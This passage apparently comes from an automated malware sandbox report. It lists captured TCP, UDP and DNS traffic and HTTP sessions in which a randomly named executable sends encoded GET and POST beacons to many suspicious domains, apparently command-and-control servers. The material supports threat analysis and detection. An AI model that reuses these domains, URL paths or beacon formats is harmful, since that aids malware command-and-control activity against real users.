                  Sep 4, 2024 09:38:45.847969055 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:45.847979069 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:45.847994089 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:45.848002911 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:45.848010063 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:45.848140001 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:45.848191023 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:45.848198891 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:45.848207951 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:47.341674089 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:47.341932058 CEST8049784104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:47.341969013 CEST4978480192.168.2.4104.21.35.73
                  Sep 4, 2024 09:38:47.352576971 CEST4978480192.168.2.4104.21.35.73
                  Sep 4, 2024 09:38:48.373433113 CEST4978580192.168.2.4104.21.35.73
                  Sep 4, 2024 09:38:48.378371954 CEST8049785104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:48.385427952 CEST4978580192.168.2.4104.21.35.73
                  Sep 4, 2024 09:38:48.388432980 CEST4978580192.168.2.4104.21.35.73
                  Sep 4, 2024 09:38:48.393294096 CEST8049785104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:49.896876097 CEST8049785104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:49.897182941 CEST8049785104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:49.897232056 CEST4978580192.168.2.4104.21.35.73
                  Sep 4, 2024 09:38:49.900093079 CEST4978580192.168.2.4104.21.35.73
                  Sep 4, 2024 09:38:49.907344103 CEST8049785104.21.35.73192.168.2.4
                  Sep 4, 2024 09:38:54.950464010 CEST4978680192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:54.955251932 CEST8049786192.185.211.122192.168.2.4
                  Sep 4, 2024 09:38:54.955451965 CEST4978680192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:54.983428001 CEST4978680192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:54.988199949 CEST8049786192.185.211.122192.168.2.4
                  Sep 4, 2024 09:38:55.450000048 CEST8049786192.185.211.122192.168.2.4
                  Sep 4, 2024 09:38:55.450339079 CEST8049786192.185.211.122192.168.2.4
                  Sep 4, 2024 09:38:55.450390100 CEST4978680192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:56.495449066 CEST4978680192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:57.529248953 CEST4978780192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:57.536259890 CEST8049787192.185.211.122192.168.2.4
                  Sep 4, 2024 09:38:57.536341906 CEST4978780192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:57.555475950 CEST4978780192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:57.560358047 CEST8049787192.185.211.122192.168.2.4
                  Sep 4, 2024 09:38:58.058960915 CEST8049787192.185.211.122192.168.2.4
                  Sep 4, 2024 09:38:58.058986902 CEST8049787192.185.211.122192.168.2.4
                  Sep 4, 2024 09:38:58.059050083 CEST4978780192.168.2.4192.185.211.122
                  Sep 4, 2024 09:38:59.071280956 CEST4978780192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:00.143090963 CEST4978880192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:00.148113012 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.148181915 CEST4978880192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:00.160928011 CEST4978880192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:00.165848017 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.165860891 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.165920019 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.165930033 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.165946960 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.165956020 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.165988922 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.166054010 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.166064024 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.656829119 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.657135010 CEST8049788192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:00.657531023 CEST4978880192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:01.664988041 CEST4978880192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:02.683399916 CEST4978980192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:03.644515991 CEST8049789192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:03.644615889 CEST4978980192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:03.925112963 CEST4978980192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:03.930006981 CEST8049789192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:04.143879890 CEST8049789192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:04.143899918 CEST8049789192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:04.143907070 CEST8049789192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:04.143969059 CEST8049789192.185.211.122192.168.2.4
                  Sep 4, 2024 09:39:04.144026041 CEST4978980192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:04.144026041 CEST4978980192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:04.148107052 CEST4978980192.168.2.4192.185.211.122
                  Sep 4, 2024 09:39:04.152889013 CEST8049789192.185.211.122192.168.2.4

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 4, 2024 09:35:45.988053083 CEST5031153192.168.2.41.1.1.1
                  Sep 4, 2024 09:35:46.000648975 CEST53503111.1.1.1192.168.2.4
                  Sep 4, 2024 09:36:01.995965004 CEST5982953192.168.2.41.1.1.1
                  Sep 4, 2024 09:36:02.020853043 CEST53598291.1.1.1192.168.2.4
                  Sep 4, 2024 09:36:15.543500900 CEST6507953192.168.2.41.1.1.1
                  Sep 4, 2024 09:36:15.579677105 CEST53650791.1.1.1192.168.2.4
                  Sep 4, 2024 09:36:29.277441025 CEST5840653192.168.2.41.1.1.1
                  Sep 4, 2024 09:36:29.289213896 CEST53584061.1.1.1192.168.2.4
                  Sep 4, 2024 09:36:42.515397072 CEST5696253192.168.2.41.1.1.1
                  Sep 4, 2024 09:36:42.693576097 CEST53569621.1.1.1192.168.2.4
                  Sep 4, 2024 09:36:56.277376890 CEST6010353192.168.2.41.1.1.1
                  Sep 4, 2024 09:36:56.296498060 CEST53601031.1.1.1192.168.2.4
                  Sep 4, 2024 09:37:09.589658976 CEST5716553192.168.2.41.1.1.1
                  Sep 4, 2024 09:37:09.899183989 CEST53571651.1.1.1192.168.2.4
                  Sep 4, 2024 09:37:23.215748072 CEST5639753192.168.2.41.1.1.1
                  Sep 4, 2024 09:37:24.008199930 CEST53563971.1.1.1192.168.2.4
                  Sep 4, 2024 09:37:37.574642897 CEST6282553192.168.2.41.1.1.1
                  Sep 4, 2024 09:37:37.584800959 CEST53628251.1.1.1192.168.2.4
                  Sep 4, 2024 09:37:45.639111996 CEST6419553192.168.2.41.1.1.1
                  Sep 4, 2024 09:37:45.741038084 CEST53641951.1.1.1192.168.2.4
                  Sep 4, 2024 09:37:59.061405897 CEST5669253192.168.2.41.1.1.1
                  Sep 4, 2024 09:37:59.082005024 CEST53566921.1.1.1192.168.2.4
                  Sep 4, 2024 09:38:12.419661999 CEST6078053192.168.2.41.1.1.1
                  Sep 4, 2024 09:38:12.911739111 CEST53607801.1.1.1192.168.2.4
                  Sep 4, 2024 09:38:26.387309074 CEST6286353192.168.2.41.1.1.1
                  Sep 4, 2024 09:38:26.422924995 CEST53628631.1.1.1192.168.2.4
                  Sep 4, 2024 09:38:39.966239929 CEST5383353192.168.2.41.1.1.1
                  Sep 4, 2024 09:38:40.396142960 CEST53538331.1.1.1192.168.2.4
                  Sep 4, 2024 09:38:54.926165104 CEST5173953192.168.2.41.1.1.1
                  Sep 4, 2024 09:38:54.938208103 CEST53517391.1.1.1192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Sep 4, 2024 09:35:45.988053083 CEST192.168.2.41.1.1.10x92f8Standard query (0)www.weep.siteA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:01.995965004 CEST192.168.2.41.1.1.10x367dStandard query (0)www.88nn.proA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:15.543500900 CEST192.168.2.41.1.1.10xfc12Standard query (0)www.fontanerourgente.netA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:29.277441025 CEST192.168.2.41.1.1.10x4200Standard query (0)www.onlytradez.clubA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:42.515397072 CEST192.168.2.41.1.1.10x78d1Standard query (0)www.32wxd.topA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:56.277376890 CEST192.168.2.41.1.1.10x9f7cStandard query (0)www.jaxo.xyzA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:09.589658976 CEST192.168.2.41.1.1.10x669fStandard query (0)www.xforum.techA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:23.215748072 CEST192.168.2.41.1.1.10xbad3Standard query (0)www.cannulafactory.topA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:37.574642897 CEST192.168.2.41.1.1.10x60feStandard query (0)www.taapbit.onlineA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:45.639111996 CEST192.168.2.41.1.1.10xe2aStandard query (0)www.ayypromo.shopA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:59.061405897 CEST192.168.2.41.1.1.10xc13dStandard query (0)www.anaidittrich.comA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:12.419661999 CEST192.168.2.41.1.1.10x8af8Standard query (0)www.551108k5.shopA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:26.387309074 CEST192.168.2.41.1.1.10x19adStandard query (0)www.datensicherung.emailA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:39.966239929 CEST192.168.2.41.1.1.10xc8cStandard query (0)www.jiyitf.topA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:54.926165104 CEST192.168.2.41.1.1.10x9249Standard query (0)www.tadalaturbo.onlineA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Sep 4, 2024 09:35:46.000648975 CEST1.1.1.1192.168.2.40x92f8No error (0)www.weep.siteweep.siteCNAME (Canonical name)IN (0x0001)false
                  Sep 4, 2024 09:35:46.000648975 CEST1.1.1.1192.168.2.40x92f8No error (0)weep.site194.233.65.154A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:02.020853043 CEST1.1.1.1192.168.2.40x367dNo error (0)www.88nn.pro45.157.69.194A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:15.579677105 CEST1.1.1.1192.168.2.40xfc12No error (0)www.fontanerourgente.netfontanerourgente.netCNAME (Canonical name)IN (0x0001)false
                  Sep 4, 2024 09:36:15.579677105 CEST1.1.1.1192.168.2.40xfc12No error (0)fontanerourgente.net37.187.158.211A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:29.289213896 CEST1.1.1.1192.168.2.40x4200No error (0)www.onlytradez.club167.172.133.32A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:42.693576097 CEST1.1.1.1192.168.2.40x78d1No error (0)www.32wxd.top32wxd.topCNAME (Canonical name)IN (0x0001)false
                  Sep 4, 2024 09:36:42.693576097 CEST1.1.1.1192.168.2.40x78d1No error (0)32wxd.top206.119.82.116A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:36:56.296498060 CEST1.1.1.1192.168.2.40x9f7cNo error (0)www.jaxo.xyz66.29.149.180A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:09.899183989 CEST1.1.1.1192.168.2.40x669fNo error (0)www.xforum.tech103.224.182.242A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:24.008199930 CEST1.1.1.1192.168.2.40xbad3No error (0)www.cannulafactory.top18.183.3.45A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:37.584800959 CEST1.1.1.1192.168.2.40x60feName error (3)www.taapbit.onlinenonenoneA (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:45.741038084 CEST1.1.1.1192.168.2.40xe2aNo error (0)www.ayypromo.shop176.57.64.102A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:37:59.082005024 CEST1.1.1.1192.168.2.40xc13dNo error (0)www.anaidittrich.com162.55.254.209A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:12.911739111 CEST1.1.1.1192.168.2.40x8af8No error (0)www.551108k5.shopgangli.ssywan.comCNAME (Canonical name)IN (0x0001)false
                  Sep 4, 2024 09:38:12.911739111 CEST1.1.1.1192.168.2.40x8af8No error (0)gangli.ssywan.com64.64.237.133A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:26.422924995 CEST1.1.1.1192.168.2.40x19adNo error (0)www.datensicherung.email85.13.151.9A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:40.396142960 CEST1.1.1.1192.168.2.40xc8cNo error (0)www.jiyitf.top104.21.35.73A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:40.396142960 CEST1.1.1.1192.168.2.40xc8cNo error (0)www.jiyitf.top172.67.215.136A (IP address)IN (0x0001)false
                  Sep 4, 2024 09:38:54.938208103 CEST1.1.1.1192.168.2.40x9249No error (0)www.tadalaturbo.onlinetadalaturbo.onlineCNAME (Canonical name)IN (0x0001)false
                  Sep 4, 2024 09:38:54.938208103 CEST1.1.1.1192.168.2.40x9249No error (0)tadalaturbo.online192.185.211.122A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • www.weep.site
                  • www.88nn.pro
                  • www.fontanerourgente.net
                  • www.onlytradez.club
                  • www.32wxd.top
                  • www.jaxo.xyz
                  • www.xforum.tech
                  • www.cannulafactory.top
                  • www.ayypromo.shop
                  • www.anaidittrich.com
                  • www.551108k5.shop
                  • www.datensicherung.email
                  • www.jiyitf.top
                  • www.tadalaturbo.online

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449736194.233.65.154805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:35:46.021095991 CEST478OUTGET /v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.weep.site
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:35:46.952487946 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:35:46 GMT
                  Server: Apache
                  Accept-Ranges: bytes
                  Cache-Control: no-cache, no-store, must-revalidate
                  Pragma: no-cache
                  Expires: 0
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html
                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                  Sep 4, 2024 09:35:46.952512026 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                  Sep 4, 2024 09:35:46.952522993 CEST1236INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                  Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                  Sep 4, 2024 09:35:46.952533960 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                  Sep 4, 2024 09:35:46.952547073 CEST896INData Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                  Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                  Sep 4, 2024 09:35:46.952558041 CEST1236INData Raw: 49 39 63 63 48 52 43 64 78 55 65 59 61 6e 46 70 51 4a 4d 42 55 44 49 46 78 77 31 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c
                  Data Ascii: I9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvN
                  Sep 4, 2024 09:35:46.952574015 CEST224INData Raw: 33 51 46 59 51 49 52 63 49 33 43 71 32 5a 4e 6b 33 74 59 64 75 75 6e 50 78 49 70 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56
                  Data Ascii: 3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6
                  Sep 4, 2024 09:35:46.952584028 CEST1236INData Raw: 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d
                  Data Ascii: GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6h
                  Sep 4, 2024 09:35:46.952609062 CEST261INData Raw: 39 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a
                  Data Ascii: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span clas
                  Sep 4, 2024 09:35:46.952620983 CEST1236INData Raw: 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a
                  Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 20www.weep.site's <a href="mailto:38
                  Sep 4, 2024 09:35:46.956553936 CEST731INData Raw: 3d 4b 68 62 38 70 54 20 28 70 6f 72 74 20 0d 0a 32 0d 0a 38 30 0d 0a 37 33 0d 0a 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: =Khb8pT (port 28073) </div> </li> <li class="info-server">107</li> </ul> </div> </div> </section>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.44973845.157.69.194805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:02.038546085 CEST733OUTPOST /l4rw/ HTTP/1.1
                  Host: www.88nn.pro
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.88nn.pro
                  Referer: http://www.88nn.pro/l4rw/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d
                  Data Ascii: 56gD=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
                  Sep 4, 2024 09:36:03.040432930 CEST302INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:02 GMT
                  Content-Type: text/html
                  Content-Length: 138
                  Connection: close
                  ETag: "667cd175-8a"
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.44973945.157.69.194805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:04.573276043 CEST753OUTPOST /l4rw/ HTTP/1.1
                  Host: www.88nn.pro
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.88nn.pro
                  Referer: http://www.88nn.pro/l4rw/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
